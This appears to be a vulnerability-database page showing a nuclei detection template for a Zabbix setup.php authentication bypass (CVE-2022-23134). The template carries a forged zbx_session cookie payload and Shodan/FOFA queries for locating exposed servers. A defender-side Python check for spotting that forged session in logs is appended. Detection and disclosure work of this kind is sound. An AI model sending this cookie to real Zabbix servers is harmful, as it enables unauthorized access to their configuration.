Zabbix Setup Configuration Authentication Bypass

02 Jul 2026 09:36:57
Reported by ProjectDiscovery
Type: nuclei
Source: github.com
57 Views

Zabbix Setup Authentication Bypass CVE-2022-23134

Code
id: CVE-2022-23134

info:
  name: Zabbix Setup Configuration Authentication Bypass
  author: bananabr
  severity: medium
  description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators but also by unauthenticated users. A malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the Zabbix setup configuration.
  remediation: |
    Apply the latest security patches or updates provided by Zabbix to fix the authentication bypass vulnerability.
  reference:
    - https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
    - https://nvd.nist.gov/vuln/detail/CVE-2022-23134
    - https://support.zabbix.com/browse/ZBX-20384
    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6SZYHXINBKCY42ITFSNCYE7KCSF33VRA/
    - https://lists.debian.org/debian-lts-announce/2022/02/msg00008.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-23134
    cwe-id: CWE-287,CWE-284
    epss-score: 0.84657
    epss-percentile: 0.99675
    cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: zabbix
    product: zabbix
    shodan-query:
      - http.favicon.hash:892542951
      - http.title:"zabbix-server"
      - cpe:"cpe:2.3:a:zabbix:zabbix"
    fofa-query:
      - icon_hash=892542951
      - app="zabbix-监控系统" && body="saml"
      - title="zabbix-server"
    google-query: intitle:"zabbix-server"
  tags: cve,cve2022,zabbix,auth-bypass,kev,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/zabbix/setup.php"
      - "{{BaseURL}}/setup.php"

    stop-at-first-match: true

    headers:
      Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Database"
          - "host"
          - "port"
          - "Zabbix"
        condition: and

      - type: word
        words:
          - "youtube_main"
          - "support.google.com"
        part: header
        condition: and
        negative: true

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b2e127e42204522940d581132463c9981defad24c5bbf4067164ae73d391bd1902210085c3691ed92aeac2e10a43a35b418520960579688775e1e85c8d008f1d73bb21:922c64590222798bb761d5b6d8e72950
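Added example, not part of the nuclei template or the ProjectDiscovery project: a defender-side Python check that decodes the zbx_session cookie format the template relies on (URL-quoted base64 JSON) and explains why a request to setup.php carrying such a session looks like a forged wizard session. The sessionid and sign format rules are assumptions about what a genuine Zabbix session looks like, and both cookie values are constructed samples (the first is the one the template sends).

```python
import base64
import json
import re
from urllib.parse import quote, unquote

# Constructed sample: the forged zbx_session value sent by the nuclei template above.
TEMPLATE_COOKIE = (
    "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwi"
    "c2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
)
# Assumptions about a genuine session: sessionid is 32 lowercase hex chars, sign is base64 text of 32+ chars.
SESSIONID_RE = re.compile(r"^[0-9a-f]{32}$")
SIGN_RE = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")


def encode_zbx_session(data: dict) -> str:
    """Build a zbx_session cookie the way the frontend does: JSON, base64, then URL-quoted."""
    return "zbx_session=" + quote(base64.b64encode(json.dumps(data).encode()).decode(), safe="")


# Constructed, well-formed-looking session for contrast (not a real token or signature).
GOOD_COOKIE = encode_zbx_session({"sessionid": "0123456789abcdef" * 2, "sign": "A" * 43 + "="})


def decode_zbx_session(cookie_header: str):
    """Return the decoded zbx_session object from a Cookie header, or None if absent or undecodable."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "zbx_session":
            try:
                data = json.loads(base64.b64decode(unquote(value), validate=True))
            except ValueError:  # binascii.Error, UnicodeDecodeError and JSONDecodeError are ValueErrors
                return None
            return data if isinstance(data, dict) else None
    return None


def setup_session_findings(path: str, cookie_header: str) -> list:
    """Explain why a request to setup.php carrying a zbx_session looks like a forged wizard session."""
    if not path.split("?", 1)[0].endswith("/setup.php"):
        return []
    data = decode_zbx_session(cookie_header)
    if data is None:
        return []
    findings = []
    sid, sign = data.get("sessionid", ""), data.get("sign", "")
    if not (isinstance(sid, str) and SESSIONID_RE.match(sid)):
        findings.append(f"sessionid is not a session token: {sid!r}")
    if not (isinstance(sign, str) and SIGN_RE.match(sign)):
        findings.append(f"sign is not a plausible session signature: {sign!r}")
    if "step" in data:  # wizard state offered to setup.php on an already-installed frontend
        findings.append(f"session carries wizard state: step={data['step']}, check_fields_result={data.get('check_fields_result')}")
    return findings
```

Run it over whatever records the Cookie header for setup.php requests (a reverse proxy or WAF log); on an installed frontend any hit on setup.php with wizard state in the session is worth an alert, and the template's cookie produces three findings.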

Scores (current as of 04 Feb 2026 07:00):
  Risk: 7 (High)
  Vulners AI Score: 7
  CVSS 2: 5
  CVSS 3.1: 3.7 - 5.3
  EPSS: 0.84657
  SSVC
  Views: 57